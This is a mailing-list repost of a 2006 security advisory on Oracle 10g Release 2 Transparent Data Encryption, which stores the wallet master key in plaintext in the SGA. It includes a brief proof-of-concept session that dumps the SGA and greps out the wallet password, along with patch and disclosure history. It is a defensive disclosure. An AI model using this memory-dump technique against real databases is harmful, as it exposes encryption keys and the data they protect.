[NEWS] Oracle Transparent Data Encryption Information Disclosure Vulnerability

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Oracle Transparent Data Encryption Information Disclosure Vulnerability
------------------------------------------------------------------------


SUMMARY

The SGA (System Global Area) is "the part of the RAM used by the ORACLE
instance. This part of memory is common to other ORACLE processes. All
necessary informations necessary for the instance operation are present
here. Transparent Data Encryption(TDE) is beneficial for simple and easy
encryption of sensitive data in table columns. Simple and easy because
users or applications need not manage the encryption and decryption of
data any more, it is handled by the database - so there is no need to
manage views, tables, or triggers to decrypt data".

Oracle Transparent Data Encryption stores keys in their unencrypted form
in the SGA, a skilled attacker or non-security DBA can retrieve these
plaintext keys.

DETAILS

Vulnerable Systems:
* Oracle Database versions 10g Release 2

The Oracle security feature "Transparent Data Encryption" is storing the
masterkey unencrypted in the SGA. A skilled attacker or non-security DBA
can retrieve the plaintext masterkey.

Example:
SQL> ALTER SYSTEM SET WALLET OPEN IDENTIFIED BY "secretpassword";
System altered.

SQL> exit
Disconnected from Oracle Database 10g Enterprise Edition Release
10.2.0.1.0
Production With the Partitioning, OLAP and Data Mining options

[oracle@ora10201 /]$ export DUMPSGA_DIR=/oracle/10.2.0/bin
[oracle@ora10201 /]$ cd /tmp
[oracle@ora10201 /]$ dumpsga
[oracle@ora10201 /]$ strings * | grep -iH secretpassword

secretpassword
secretpassword
secretpassword


[] Excerpt from the SGA
/oracle/10.2.0/admin/ora01/wallet/^@"[q^@^@
d$d$^@?y*cle/10.2.0/admin/ora10201/wallet/^@^@^@^@^@^9^@^@0 d$d d$-

^@^@0 d$L4^L ^Xp / ]/ <8f>^Dsecretpassword^@^M^U^B^@ d$
4^Lfile:/oracle/10.2.0/admin/ora10201/wallet[]


Patch Availability:
Oracle fixed this issue with the patches from the critical patch update
January 2006 for Oracle 10g Release 2.

History:
11.07.05 - Oracle secalert was informed
12.07.05 - Bug confirmed
17.01.06 - Oracle published the Critical Patch Update January 2006 (CPU
January 2006)
17.01.06 - Red-Database-Security published this advisory


ADDITIONAL INFORMATION

The information has been provided by
<mailto:ak@xxxxxxxxxxxxxxxxxxxxxxxxx> Alexander Kornbrust.
The original article can be found at:
<http://www.red-database-security.com/advisory/oracle_tde_unencrypted_sga.html> http://www.red-database-security.com/advisory/oracle_tde_unencrypted_sga.html



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages